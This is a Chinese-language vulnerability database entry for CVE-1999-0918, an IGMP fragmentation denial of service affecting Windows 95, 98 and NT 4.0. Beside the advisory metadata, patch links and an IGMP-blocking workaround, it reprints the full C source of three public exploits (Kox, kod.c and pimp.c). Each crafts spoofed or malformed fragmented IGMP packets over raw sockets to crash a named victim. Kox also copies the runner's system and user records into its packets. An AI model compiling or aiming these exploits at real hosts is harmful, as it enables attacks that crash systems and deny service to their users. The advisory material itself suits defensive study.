CVE-1999-0918
CVSS7.8
发布时间 :1999-07-03 00:00:00
修订时间 :2008-09-09 00:00:00
NMCOE    

[原文]Denial of service in various Windows systems via malformed, fragmented IGMP packets.


[CNNVD]Microsoft Windows无效IGMP头数据包拒绝服务攻击漏洞(MS99-034)(CNNVD-199907-007)

        
        IGMP(Internet组管理协议)可以让一个物理网络上的所有系统知道主机当前所在的多播组。
        早期Windows系统对IGMP碎片包的处理存在漏洞,远程攻击者可能利用此漏洞对目标系统进行拒绝服务攻击。
        对于MS Windows NT 4.0/95/98/98v2,IGMP碎片包可能导致TCP/IP协议栈不正确地访问无效内存,最终系统蓝屏崩溃。攻击者可以通过发送IGMP碎片逐级进行拒绝服务攻击。此漏洞相关信息在新闻组和邮件列表中可以用IGMP NUKE、IGMP DOS等为关键字搜索到。
        

- CVSS (基础分值)

CVSS分值: 7.8 [严重(HIGH)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-20 [输入验证不恰当]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_nt:4.0:sp5Microsoft Windows 4.0 sp5
cpe:/o:microsoft:windows_2000Microsoft Windows 2000
cpe:/o:microsoft:windows_95Microsoft Windows 95
cpe:/o:microsoft:windows_nt:4.0:sp3Microsoft Windows 4.0 sp3
cpe:/o:microsoft:windows_98::goldMicrosoft windows 98_gold
cpe:/o:microsoft:windows_nt:4.0:sp1Microsoft Windows 4.0 sp1
cpe:/o:microsoft:windows_nt:4.0:sp4Microsoft Windows 4.0 sp4
cpe:/o:microsoft:windows_nt:4.0Microsoft Windows NT 4.0
cpe:/o:microsoft:windows_nt:4.0:sp2Microsoft Windows 4.0 sp2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0918
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0918
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199907-007
(官方数据源) CNNVD

- 其它链接及资源

http://www.microsoft.com/technet/security/bulletin/ms99-034.mspx
(PATCH)  MS  MS99-034
http://www.securityfocus.com/bid/514
(UNKNOWN)  BID  514
http://support.microsoft.com/default.aspx?scid=kb;%5BLN%5D;Q238329
(UNKNOWN)  MSKB  Q238329

- 漏洞信息

Microsoft Windows无效IGMP头数据包拒绝服务攻击漏洞(MS99-034)
高危 其他
1999-07-03 00:00:00 2006-04-19 00:00:00
远程※本地  
        
        IGMP(Internet组管理协议)可以让一个物理网络上的所有系统知道主机当前所在的多播组。
        早期Windows系统对IGMP碎片包的处理存在漏洞,远程攻击者可能利用此漏洞对目标系统进行拒绝服务攻击。
        对于MS Windows NT 4.0/95/98/98v2,IGMP碎片包可能导致TCP/IP协议栈不正确地访问无效内存,最终系统蓝屏崩溃。攻击者可以通过发送IGMP碎片逐级进行拒绝服务攻击。此漏洞相关信息在新闻组和邮件列表中可以用IGMP NUKE、IGMP DOS等为关键字搜索到。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 由于IGMP对一般应用来说是不需要的,可以在网络设备上阻塞IGMP包。
        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS99-034)以及相应补丁:
        MS99-034:Patch Available for "Fragmented IGMP Packet" Vulnerability
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS99-034.asp

        补丁下载:
        Windows 98:
        
        http://www.microsoft.com/windows98/downloads/corporate.asp

        Windows NT Workstation 4.0; Windows NT Server 4.0;
        Windows NT Server, Enterprise Edition:
        ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40/hotfixes-postSP5/IGMP-fix/
        Windows NT Server 4.0, Terminal Server Edition:
        ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40TSE/hotfixes-postSP5/IGMP-fix/
        也可以直接从这里更新:
        
        http://www.microsoft.com/windowsupdate

- 漏洞信息 (19413)

Windows 95/98,Windows NT Enterprise Server <= 4.0 SP5,Windows NT Terminal Server <= 4.0 SP4,Windows NT Workstation <= 4.0 SP5 (1) (EDBID:19413)
windows dos
1999-07-03 Verified
0 Coolio
N/A [点击下载]
source: http://www.securityfocus.com/bid/514/info


The Windows 98 and Windows 2000 TCP/IP stacks were not built to reliably tolerate malformed IGMP headers. When one is received, the stack will sometimes fail with unpredictable results ranging from a Blue Screen to instantaneous reboot. 

/***
        Kox by Coolio (coolio@k-r4d.com)

        this was a successful attempt to duplicate klepto/defile's kod win98
        exploit and add spoofing support to it. me and defile made this a
        race to see who could do spoofing kod first. he won. (mine's better!)
        my kox and defile's skod output about the same packets
        but he had skod working a few hours before i had kox working.

        affected systems: windows 98, windows 98 SE, windows 2000 build 2000
        results: bluescreen, tcp/ip stack failure, lockup, or instant reboot

        thanks to klepto and defile for making kod, psilord for wanting
        to understand what we were doing, greg for telling me about iphdr.ihl,
        mancide for letting me use his win98 boxen to test on, and the
        few other people i crashed trying to get this working right.

        also thanks to the authors of elvis for making such a badass editor.
***/



#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netdb.h>
#include <string.h>
#include <errno.h>
#include <pwd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/utsname.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/igmp.h>



void usage(char *arg)
{
        printf("Kox by Coolio (coolio@k-r4d.com)\n");
        printf("Usage: %s <victim>\n", arg);
        exit(1);
}


unsigned int randip()
{
        struct hostent *he;
        struct sockaddr_in sin;
        char *buf = (char *)calloc(1, sizeof(char) * 16);

        sprintf(buf, "%d.%d.%d.%d",
                (random()%191)+23,
                (random()%253)+1,
                (random()%253)+1,
                (random()%253)+1); 

        inet_aton(buf, (struct in_addr *)&sin);
        return sin.sin_addr.s_addr;
}

unsigned short in_cksum(unsigned short *buh, int len)
{
        register long sum = 0;
        unsigned short oddbyte;
        register unsigned short answer;

        while(len > 1) {
                sum += *buh++;
                len -= 2;
        }

        if(len == 1) {
                oddbyte = 0;
                *((unsigned char *)&oddbyte) = *(unsigned char *)buh;
                sum += oddbyte;
        }

        sum = (sum >> 16) + (sum & 0xFFFF);
        sum += (sum >> 16);
        answer = ~sum;
        return answer;
}

int nuke_igmp(struct sockaddr_in *victim, unsigned long spoof)
{
        int BIGIGMP = 1500;
        unsigned char *pkt;
        struct iphdr *ip;
        struct igmphdr *igmp;
        struct utsname *un;
        struct passwd *p;

        int i, s;
        int id = (random() % 40000) + 500;

        pkt = (unsigned char *)calloc(1, BIGIGMP);
        ip = (struct iphdr *)pkt;
        igmp = (struct igmphdr *)(pkt + sizeof(struct iphdr));

        ip->version = 4;
        ip->ihl = (sizeof *ip) / 4;
        ip->ttl = 255;
        ip->tot_len = htons(BIGIGMP);
        ip->protocol = IPPROTO_IGMP;
        ip->id = htons(id);
        ip->frag_off = htons(IP_MF);
        ip->saddr = spoof;
        ip->daddr = victim->sin_addr.s_addr;
        ip->check = in_cksum((unsigned short *)ip, sizeof(struct iphdr));

        igmp->type = 0;
        igmp->group = 0;
        igmp->csum = in_cksum((unsigned short *)igmp, sizeof(struct igmphdr));

        for(i = sizeof(struct iphdr) + sizeof(struct igmphdr) + 1;
            i < BIGIGMP; i++)
                pkt[i] = random() % 255;
#ifndef I_GROK
        un = (struct utsname *)(pkt + sizeof(struct iphdr) +
              sizeof(struct igmphdr) + 40);
        uname(un);
        p = (struct passwd *)((void *)un + sizeof(struct utsname) + 10);
        memcpy(p, getpwuid(getuid()), sizeof(struct passwd));
#endif
        if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
                perror("error: socket()");
                return 1;
        }

        if(sendto(s, pkt, BIGIGMP, 0, victim,
           sizeof(struct sockaddr_in)) == -1) { 
                perror("error: sendto()");
                return 1;
        }
        usleep(1000000);

        for(i = 1; i < 5; i++) {
                if(i > 3)
                        ip->frag_off = htons(((BIGIGMP-20) * i) >> 3);
                else
                        ip->frag_off = htons(((BIGIGMP-20) * i) >> 3 | IP_MF);
                sendto(s, pkt, BIGIGMP, 0, victim, sizeof(struct sockaddr_in));
                usleep(2000000);
        }

        free(pkt);
        close(s);
        return 0;
}

int main(int argc, char *argv[])
{
        struct sockaddr_in victim;
        struct hostent *he;
        int i;

        srandom(time(NULL));

        if(argc < 2)
                usage(argv[0]);

        if((he = gethostbyname(argv[1])) == NULL) {
                herror(argv[1]);
                exit(1);
        }
        memcpy(&victim.sin_addr.s_addr, he->h_addr, he->h_length);
        victim.sin_port = htons(0);
        victim.sin_family = PF_INET;

        printf("IGMP> ");
        fflush(stdout);
        for(i = 0; i < 10; i++)
        {
                nuke_igmp(&victim, randip());
                printf(".");
                fflush(stdout);
        }
        printf("\n");
        fflush(stdout);
}
		

- 漏洞信息 (19414)

Windows 95/98,Windows NT Enterprise Server <= 4.0 SP5,Windows NT Terminal Server <= 4.0 SP4,Windows NT Workstation <= 4.0 SP5 (2) (EDBID:19414)
windows dos
1999-07-03 Verified
0 klepto
N/A [点击下载]
source: http://www.securityfocus.com/bid/514/info
 
 
The Windows 98 and Windows 2000 TCP/IP stacks were not built to reliably tolerate malformed IGMP headers. When one is received, the stack will sometimes fail with unpredictable results ranging from a Blue Screen to instantaneous reboot. 

/*
::: kod.c (kiss of death) version 1.2
::: [author] kod.c bug found by klepto /
klepto@levitate.net / rewritten by ignitor / ignitor@EFnet
::: [stuph ] works on bsd/linux/*nix
::: [notes ] bluescreens windows users(98/98se) and kills
tcp stack
::: [m$ bug] windows handles igmp badly and this is the
result
::: [greets]
amputee/nizda/nyt/ignitor/skyline/codelogic/ill`/conio/egotr
ip/TFreak/napster
::: [greets] dist(test monkey)/naz(you rule period.)/#havok/
#irc_addict/#kgb/#eof/everyone
::: [action] ./kod <host> and BEWM!
::: [rant  ] there will be lots of rewrites to this.. just
get our name right!
de omnibus dubitandum
*/

/*
windows core dump output (*whee*)
An exception 0E has occurred at 0028:C14C9212 in VxD VIP
(01) +
00006C72.  This was called from 0028:C183FF54 in VcD PPPMAC
(04) +
000079BR.  It may be possible to continue normally(*not*).
*/


#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>

struct iphdr
{
  unsigned char ihl:4, version:4, tos;
  unsigned short tot_len, id, frag_off;
  unsigned char ttl, protocol;
  unsigned short check;
  unsigned int saddr, daddr;
};

struct igmphdr
{
  unsigned char type, code;
  unsigned short cksum;
  struct in_addr group;
};

unsigned short in_chksum(unsigned short *, int);
long resolve(char *);

long resolve(char *host)
{
  struct hostent *hst;
  long addr;

  hst = gethostbyname(host);
  if (hst == NULL)
    return(-1);

  memcpy(&addr, hst->h_addr, hst->h_length);

  return(addr);
}

int main(int argc, char *argv[])
{
  struct sockaddr_in dst;
  struct iphdr *ip;
  struct igmphdr *igmp;
  long daddr, saddr;
  int s, i=0, c, len;
  char buf[1500];

  if (argc < 3)
  {
    printf("KOD spoofer by Ignitor and klepto\n");
    printf("Usage: %s <src> <dst>\n", *argv);
    return(1);
  }

  daddr = resolve(argv[2]);
  saddr = resolve(argv[1]);

  memset(buf, 0, 1500);
  ip = (struct iphdr *)&buf;
  igmp = (struct igmphdr *)&buf[sizeof(struct iphdr)];

  dst.sin_addr.s_addr = daddr;
  dst.sin_family = AF_INET;

  ip->ihl = 5;
  ip->version = 4;
  ip->tos = 0;
  ip->tot_len = htons(10933);
  ip->id = htons(48648);
  ip->ttl = 64;
  ip->protocol = IPPROTO_IGMP;
  ip->check = in_chksum((unsigned short *)ip, sizeof(struct
iphdr));
  ip->saddr = saddr;
  ip->daddr = daddr;

  s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if (s == -1)
    return(1);

  printf("Sending IGMP packets: %s -> %s\n", argv[1], argv
[2]);

  for (c=0;c<2;c++)
  {
    len = 220;
    ip->frag_off = htons(0x73a);

    for (i=0;;i++)
    {
      if (sendto(s,&buf,len,0,(struct sockaddr *)&dst,sizeof
(struct sockaddr_in)) == -1)
      {
        perror("Error sending packet");
        exit(-1);
      }
      if (ntohs(ip->frag_off) == 0x2000)
        break;
      len = 1500;
      if (!i)
        ip->frag_off = htons(0x2681);
      else
        ip->frag_off = htons(ntohs(ip->frag_off) - 185);

      ip->check = in_chksum((unsigned short *)ip, sizeof
(struct iphdr));
    }
  }

  return(1);
}

unsigned short in_chksum(unsigned short *addr, int len)
{
   register int nleft = len;
   register int sum = 0;
   u_short answer = 0;

   while (nleft > 1) {
      sum += *addr++;
      nleft -= 2;
   }

   if (nleft == 1) {
      *(u_char *)(&answer) = *(u_char *)addr;
      sum += answer;
   }

   sum = (sum >> 16) + (sum & 0xffff);
   sum += (sum >> 16);
   answer = ~sum;
   return(answer);
}

		

- 漏洞信息 (19415)

Windows 95/98,Windows NT Enterprise Server <= 4.0 SP5,Windows NT Terminal Server <= 4.0 SP4,Windows NT Workstation <= 4.0 SP5 (3) (EDBID:19415)
windows dos
1999-04-06 Verified
0 Rob Mosher
N/A [点击下载]
source: http://www.securityfocus.com/bid/514/info
  
  
The Windows 98 and Windows 2000 TCP/IP stacks were not built to reliably tolerate malformed IGMP headers. When one is received, the stack will sometimes fail with unpredictable results ranging from a Blue Screen to instantaneous reboot. 

/*
** pimp.c 6/4/99 by Rob Mosher: nyt@deadpig.org
** exploits bug in m$'s ip stack
** rewrite by nyt@EFnet
** bug found by klepto
** usage: pimp <host>
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <sys/socket.h>

struct igmp
{
        unsigned char igmp_type;
        unsigned char igmp_code;
        unsigned short igmp_cksum;
        struct in_addr igmp_group;
};

#define ERROR(a) {printf("ERROR: %s\n", a);exit(-1);}

u_long  resolve(char *);

int main(int argc, char *argv[])
{
 int nsock, ctr;
 char *pkt, *data;
 struct ip *nip;
 struct igmp *nigmp;
 struct sockaddr_in s_addr_in;

 setvbuf(stdout, NULL, _IONBF, 0);

 printf("pimp.c by nyt\n");

 if(argc != 2)
  ERROR("usage: pimp <host>");

 if((nsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
  ERROR("could not create raw socket");

 pkt = malloc(1500);
 if(!pkt)
  ERROR("could not allocate memory");

 memset(&s_addr_in, 0, sizeof(s_addr_in));
 memset(pkt, 0, 1500);

 nip = (struct ip *) pkt;
 nigmp = (struct igmp *) (pkt + sizeof(struct ip));
 data = (char *)(pkt + sizeof(struct ip) + sizeof(struct igmp));
 memset(data, 'A', 1500-(sizeof(struct ip) + sizeof(struct igmp)));

 s_addr_in.sin_addr.s_addr = resolve(argv[1]);

 nip->ip_v  = 4;
nip->ip_hl  = 5;
 nip->ip_tos  = 0;
 nip->ip_id  = 69;
 nip->ip_ttl  = 255;
 nip->ip_p  = IPPROTO_IGMP;
 nip->ip_sum  = 0;
 nip->ip_dst.s_addr = s_addr_in.sin_addr.s_addr;
 nip->ip_src.s_addr = 2147100000;
 nigmp->igmp_type = 2;
 nigmp->igmp_code = 31;
 nigmp->igmp_cksum = 0;

 inet_aton("128.1.1.1", &nigmp->igmp_group);

 printf("pimpin' dem trick-ass-bitches");

 for(ctr = 0;ctr < 15;ctr++)
 {
  printf(".");
  nip->ip_len  = 1500;
  nip->ip_off  = htons(IP_MF);
  sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in,
sizeof(s_addr_in));

  nip->ip_off  = htons(1480/8)|htons(IP_MF);
  sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in,
sizeof(s_addr_in));

  nip->ip_off  = htons(5920/8)|htons(IP_MF);
  sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in,
sizeof(s_addr_in));

  nip->ip_len   = 831;
  nip->ip_off  = htons(7400/8);
  sendto(nsock, pkt, 831, 0, (struct sockaddr *) &s_addr_in,
sizeof(s_addr_in));

  usleep(500000);
}

 printf("*slap* *slap* bitch, who yo daddy\n");
 shutdown(nsock, 2);
 close(nsock);
}

u_long resolve(char *host)
{
        struct hostent *he;
        u_long ret;

        if(!(he = gethostbyname(host)))
        {
                herror("gethostbyname()");
                exit(-1);
        }
        memcpy(&ret, he->h_addr, sizeof(he->h_addr));
        return ret;
}

		

- 漏洞信息

1022
Microsoft Windows Invalid IGMP Header Handling Remote DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

- 时间线

1999-07-04 Unknow
1999-07-04 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站